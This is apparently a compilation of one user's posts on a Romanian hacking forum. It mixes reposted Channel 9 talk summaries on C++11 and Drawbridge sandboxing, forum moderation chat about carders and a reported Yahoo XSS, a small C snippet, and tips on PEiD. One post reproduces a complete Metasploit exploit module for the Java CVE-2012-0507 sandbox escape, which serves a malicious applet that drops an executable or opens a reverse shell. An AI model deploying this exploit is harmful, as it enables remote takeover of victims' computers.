Nytro

[h=1]Herb Sutter, Andrei Alexandrescu and Scott Meyers - C++11[/h] Posted: Oct 04, 2011 at 9:25 AM By: Charles I was able to attend C++ and Beyond 2011 and it was a tremendous experience. The technical depth and C++ goodness was profound and lasted for 3 whole days (and two evenings). Thanks Andrei Alexandrescu, Scott Meyers and Herb Sutter for allowing me to crash your affair with my camera - which was perhaps too big and too advanced for the likes of me - still, I was abe to capture some great content like this panel on C++11 with Scott, Andrei and Herb. Great questions from attendees. Note that this is the first in a series of three panels from C++ and Beyond 2011 that will appear on C9 over the coming months. Make sure to check out all the C&B 2011 content we're lucky enough to have stored on C9 Enjoy! Learn! Table of contents (click on the time code link to move the player to that point in time...): [00:19] When should new C++11 features be adopted in production? [09:28] C++11 Memory Model [15:23] Which C++11 features remain broadly missing? [16:25] When can we expect full C++11 conformance from the major compilers? [19:45] -> Herb Sutter asks YOU a question (please answer on this thread): What do you want the standards committee to work on next? Should they immediately start work on new features? Should they take a break before new feature work? [21:45] What about debugging, linking and tools - as it relates to C++11? [23:56] What really happened to Concepts? [29:07] Will existing code have to be changed just to compile with a new C++11 conforming compiler? [29:38] Why was a seemlingly complicated feature (to implement) like variadic templates rolled out sooner than a seemingly simple feature like templated typedefs? [32:42] What do you think we'll get wrong most often when using C++11 features? [45:13] Return by ref or by value - is there a universal rule of thumb? [48:32] Why don't lambdas have typedefs for argument types? [53:02] How do you capture enclosing scope variables when using lambdas? Download: http://ch9files.blob.core.windows.net/ch9/ecc8/aacddb61-f53f-4264-abb1-9f420166ecc8/CppBeyond11Cpp11Panel_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/ecc8/aacddb61-f53f-4264-abb1-9f420166ecc8/CppBeyond11Cpp11Panel_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/C-and-Beyond-2011-C11-Panel-Scott-Meyers-Andrei-Alexandrescu-and-Herb-Sutter

[h=1]Drawbridge: A new form of virtualization for application sandboxing[/h] Posted: Oct 17, 2011 at 10:27 AM By: Charles Drawbridge is a research prototype of a new form of virtualization for application sandboxing. Drawbridge combines two core technologies: First, a picoprocess, which is a process-based isolation container with a minimal kernel API surface. Second, a library OS, which is a version of Windows enlightened to run efficiently within a picoprocess. Drawbridge combines two ideas from the literature, the picoprocess and the library OS, to provide a new form of computing, which retains the benefits of secure isolation, persistent compatibility, and execution continuity, but with drastically lower resource overheads. The Drawbridge library OS is an experimental Windows 7 library OS - a research project and proving ground for a larger concept: application virtualization and sandboxing. Drawbridge is capable of running the latest releases of major Windows applications such as Microsoft Excel, PowerPoint, and Internet Explorer with very little overhead compared to the traditional virtualization techniques. The experiment is going well! Now, what's going on here, exactly? Drawbridge research team members Galen Hunt, Reuben Olinsky and Jon Howell dig into some of the details, including project rationale and OS architecture, of research project Drawbridge. Paper: Rethinking the Library OS from the Top Down - Microsoft Research Download: http://ch9files.blob.core.windows.net/ch9/f427/abf131e6-cd47-4335-94d8-9e8d000bf427/MSRDrawbridgeAppVirtualizationResearch_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/f427/abf131e6-cd47-4335-94d8-9e8d000bf427/MSRDrawbridgeAppVirtualizationResearch_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/Drawbridge-An-Experimental-Library-Operating-System

[h=1]C&B 2011 Panel: Herb Sutter, Andrei Alexandrescu and Scott Meyers - Concurrency and Parallelism[/h] Posted: Nov 15, 2011 at 6:00 AM By: Charles I was able to attend C++ and Beyond 2011 and it was a tremendous experience. The technical depth and C++ goodness was profound and lasted for 3 whole days (and two evenings). Thanks Andrei Alexandrescu, Scott Meyers and Herb Sutter for allowing me to crash your affair with my camera - which was perhaps too big and too advanced for the likes of me - still, I was abe to capture some great content like this interactive panel on Concurrency and Parallelism with Scott, Andrei and Herb. Great questions from attendees. Note that this is the second in a series of three panels from C++ and Beyond 2011 that will appear on C9 over the coming months. Make sure to check out all the C&B 2011 content we're lucky enough to have stored on C9 Enjoy! Learn! Table of contents (click on the time code link to move the player to that point in time...): [00:00] Using multiple cores for useful work... [01:56] Does C++AMP build on PPL? [02:48] What about operating system scheduling for GPU operations? [03:49] Transition from platform-specific memory models to a standard(ized) C++ memory model (C++11's MM, to be specific...). [06:41] Is there a performance penalty associated with a standard C++ memory model? [09:18] What about functional languages/techniques (with respect to parallel and concurrent programming)? [15:44] Which performance pitfalls we may pitfall into? [16:13] What about the work on ranges and wouldn't they help parallelism? [20:34] Fortran arrays have things like slices and strides. What about C++AMP? [22:42] Parallel debugging... [23:30] How baked is C++AMP? [25:26] On SIMD and MIMD... [34:20] Computation-following-data versus data-following-computation... Download: http://ch9files.blob.core.windows.net/ch9/28f6/fc9b793f-cd7d-4280-b4cb-9f42016f28f6/CppBeyond11ConcurrencyPanel_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/28f6/fc9b793f-cd7d-4280-b4cb-9f42016f28f6/CppBeyond11ConcurrencyPanel_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/CB-2011-Panel-Herb-Sutter-Andrei-Alexandrescu-and-Scott-Meyers-Concurrency-and-Parallelism

Spune exact ce/cum/unde sa fie.

Exista carti, exista tutoriale, exista videoclipuri, se preda in licee/facultati, exista academii speciale pentru asa ceva, trebuie doar sa iti dai putin interesul.

Incepatori... Sa incepem cu o intrebare: ce ai citit legat de programare?

OMFG, asta e 0day, acum a aflat toata lumea...

Pula mea, nu erau indexate, dar external.php ala scotea ultimele posturi din tabelul "post"... INNER JOIN " . TABLE_PREFIX . "forum AS forum ON(forum.forumid = thread.forumid) Am pus eu: INNER JOIN " . TABLE_PREFIX . "forum AS forum ON(forum.forumid = thread.forumid AND forum.forumid <> 10 AND forum.forumid <> 11) Daca e vreo problema, spuneti.

gfhgfhfgh

Bum: http://i44.tinypic.com/j65pqx.png Si probabil e multe altele.

Nu am mai vazut de ani creatii proprii ale utilizatorilor... Deci o sectiune ar fi inutila. Posteaza, vedem dupa ce si cum.

User-ul "100" de aici e carder, mi-a zis direct. Zicea ca are forum de CC si mi-a propus sa isi faca reclama, daca are voie. Eu nu m-am stresat, dar ideea era ca astfel, discutiile despre carduri si alte cacaturi se vor putea posta pe forumul lui, iar noi am mai scapa de ei si ne-ar lasa in voia noastra. Voi ce ziceti? Luni fac la mine la facultate o prezentare despre securitatea aplicatiilor web (cacaturi de baza) iar dupa, o sa imi fac ceva timp de RST, si vedem exact ce facem. Apoi, ramanem cu RST market doar pentru cei cu 50+ posturi?

In sfarsit... Bine ai venit.

Legat de posturile de la RST Market, cand vad ceva aiurea, dau Delete, dar cand sunt multe nu sunt atent si e posibil sa mai fi acceptat eu vreo 2-3 naspa, dar le citesc de la cap la coada de obicei. In fine, eu cred ca ar fi bine sa inchidem un timp RST Market, e posibil sa fie lume cautata din cauza rahaturilor de pe acolo... //fraza editata (nu are legatura cu subiectul in cauza)// Nu o sa am timp nici in viitorul apropiat, sper sa imi fac pe viitor, sa mai fac cate ceva... Sa imi ziceti si mie daca vreti sa schimbati ceva.

"Thank you for sending this to Yahoo!. It has been passed along to the correct teams to investigate. Should there be question, we will contact you here. If a fix is required, we will again contact you and ask that you see the issue as resolved." Cateva ore mai tarziu: "A fix has been put in place and we ask that you see this issue as resolved." Mi-a facut placere, expl0iter. Faceti ce vreti cu XSS-urile de Yahoo, dar nu pe RST.

Am comandat eu, dar nu eram in tara. Era o "promotie", transport gratuit la multe produse, free doar 30 de zile, apoi dezactivat pentru ca iti lua de pe card 80 de dolari (pe un an). Nu stiu cum e pentru Romania.

Ban permanent. Si am trimis mail la Yahoo. Daca nu ii convine cuiva, _|_.

In sfarsit cineva pasionat de programare, bun venit.

Hai sa mergem diseara pe la el.

Pai ba, zicea co4ie ca venim la tine sa bem sambata, de-aia am crezut.

Pentru ca pe Windows nu o sa mearga, e if(c != '\r') Iar '\r' == 13 si '\n' == 10, e acelasi lucru.

Ok ar fi cam asa: #include <stdio.h> void f(unsigned char c) { if(c != 0xD) { f(getch()); printf("%c", c); } } int main() { f(getch()); return 0; } Pe Windows putea sa fie 10, dar am incercat inainte, si e 13.

Nu, intrebarea e gandita, fara vectori, pointeri sau clase (e "C" nu "C++"). Raspunsurile pe PM.

[h=1]Java AtomicReferenceArray Type Violation Vulnerability[/h] ### This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize( info = {} ) super( update_info( info, 'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability', 'Description' => %q{ This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r', # metasploit module 'juan vazquez', # metasploit module 'egypt' # special assistance ], 'References' => [ ['CVE', '2012-0507'], ['BID', '52161'], ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'], ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'] ], 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 14 2012' )) end def exploit # load the static jar file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" ) fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close super end def on_request_uri( cli, request ) data = "" host = "" port = "" peer = "#{cli.peerhost}:#{cli.peerport}" if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + '/', '') return end print_status("#{peer} - Sending #{self.name}") payload = regenerate_payload( cli ) if not payload print_error("#{peer} - Failed to generate the payload." ) return end if target.name == 'Generic (Java Payload)' if datastore['LHOST'] jar = payload.encoded host = datastore['LHOST'] port = datastore['LPORT'] vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" ) else port = datastore['LPORT'] datastore['RHOST'] = cli.peerhost vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." ) end if jar print_status( "Generated jar to drop (#{jar.length} bytes)." ) jar = Rex::Text.to_hex( jar, prefix="" ) else print_error("#{peer} - Failed to generate the executable." ) return end else # NOTE: The EXE mixin automagically handles detection of arch/platform data = generate_payload_exe if data print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) else print_error("#{peer} - Failed to generate the executable." ) return end end send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) return end print_status( "#{peer} - sending jar..." ) send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html( data, jar, host, port ) jar_name = rand_text_alpha(rand(6)+3) + ".jar" html = "<html><head></head>" html += "<body>" html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">" html += "<param name=\"data\" value=\"#{data}\"/>" if data html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar html += "<param name=\"lhost\" value=\"#{host}\"/>" if host html += "<param name=\"lport\" value=\"#{port}\"/>" if port html += "</applet></body></html>" return html end def generate_jar() return @jar_data end end Sursa: Java AtomicReferenceArray Type Violation Vulnerability

Exista programe care pe baza unor semnaturi iti arata ce posibilitati ar putea fi. Java? Asta e altceva, are cumva extensia .jar sau .class? Daca e .exe sau .dll, vezi: PEiD Vezi si PE Explorer si multe alte programe utile...